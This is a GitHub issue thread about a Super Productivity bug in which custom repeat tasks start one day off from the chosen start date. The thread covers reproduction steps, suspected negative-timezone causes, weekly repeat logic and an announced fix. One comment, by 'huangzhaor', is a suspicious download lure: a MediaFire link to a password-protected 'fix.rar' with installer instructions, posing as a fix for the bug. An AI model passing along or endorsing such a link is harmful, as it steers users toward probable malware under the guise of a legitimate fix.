### ISSUE TITLE
Custom repeat start date isn't the first occurrence of the repeat task

### ISSUE THREAD

**Issue by dramm33** [johannesjo/super-productivity#3366]
### Expected Behavior
When creating a Custom Repeat Task, it's expected/intuitive that it first occurs on the set "Start date" (which should be the cycle start) and then again according to what is set on the "Repeat every" and "Repeat cycle" fields.
E.g.: With the cycle set to repeat every 2 days, and the start date set to 08/26/24, the first occurrence of the task should be on the 26th and the next on the 28th.

### Current Behavior
When creating a Custom Repeat Task, the "Start date" starts the count for the amount of time the task **won't** happen, as if the task just occurred the day before the "Start date".
E.g.: With the cycle set to repeat every 2 days, and the start date set to 08/26/24, the first occurrence of the task is on the 27th and the next on the 29th.

### Steps to Reproduce

1. Create a regular task
2. Use the side panel to add/edit "Repeat Task Config"
3. Set "Repeat Config" to "Custom repeat config"
4. Set "Repeat cycle" to "Day", "Month" or "Year". E.g., "Day"
5. Set "Repeat every" to something other than 1, e.g., "2"
6. Leave "Start date" as the current date
7. Set "Scheduled start time" and "Remind at" to something other than blank
8. Look for the task on the "Timeline" page, at the set date and time

### Notes
1. When the task is set to repeat every 2 months, the task will happen a day before and two months after whatever is set on the "Start date". E.g.: With start on 06/28/24, the next occurrence will be on 08/27/24. This confirms the idea that it's as if the first occurrence of the task was a day before the "Start date".
2. When the task is set to repeat every 2 years, the task will happen a day before and two years after whatever is set on the "Start date". E.g.: With start on 08/28/22, the next occurrence will be on 08/27/24. This confirms the idea that it's as if the first occurrence of the task was a day before the "Start date".
3. When the "Repeat cycle" is set to "Week", weird things happen. There might be something else going on. I couldn't understand it well, especially since I'm not even sure what is the expected behavior. If you let me know what it should be doing regarding the relation between the start date and the week, then maybe I can help with the debugging.

### Meta Info
META: SP9.0.7 Electron – en-US – Win32 – Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) superProductivity/9.0.7 Chrome/122.0.6261.156 Electron/29.4.5 Safari/537.36

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by johannesjo** [comment]
Thank you very much for investigating so thoroughly!!  I rechecked the code and the unit tests and all seems to be correct. I also created some tasks to reproduce this. I'll check in in two days ;)

Possibly it is a timezone issue?May I ask which one you're in?

Repeat weekly is a bit more complicated, since it accounts for the weekdays selected. Generally it should work  as follows:
* the start date is determining the week nr, the day should not matter apart from the very first instance
* if monday and repeatEvery 2 is selected then it should be recreated for every 2 weeks on monday

**Comment by johannesjo** [comment]
Another thing that came to my mind: Have you tried the current pre release? There  is a new planner feature where also the future repeat projections are shown. Might be worth checking out if those are correct on your machine.

**Comment by dramm33** [comment]
My timezone is UTC-3.
I can confirm the same issue also happens on Android (same timezone).

### As for the 10.0.0-rc.0
* Day, month, and year seem fixed on the new "Planner" view.
* I've synced the rc running on Win10 to the v9.0.7 running on Android and even with the repeat created in v10-rc, it shows incorrectly on Android. So it seems the bug was related only to the "timeline" view.
* Weekly repeat is still buggy. With "Start date" set to 08/31/2024, Monday and Tuesday are selected for repeat every 2 weeks, it shows on the planner on Tue 3.9. and on Wed 11.9.. Switching the "Start date" to 08/28/2024, makes the tasks appear on Tue 10.9. and Wed 11.9.. On misc settings, I've set the week start to Sunday.
* Also, I've noticed none of my daily repeat tasks show up on Sun 1.9.

Since the title of this issue is no longer relevant to the current bug, let me know if you want me to create a new issue (and close this one).

**Comment by johannesjo** [comment]
Hey @dramm33 ! A new issue would be great! It's often a couple of days apart when I find time to look into the issue updates and it helps a lot if I can quickly grasp the problem :)

**Comment by johannesjo** [comment]
It seems negative timezones are a much bigger subject than I expected: #3402 
Hopefully I was able to fix some of the issues you experience with the commits for #3402. Not sure if there is more.

**Comment by johannesjo** [comment]
A fix will be out with the next release. Please let me know if it works for you!
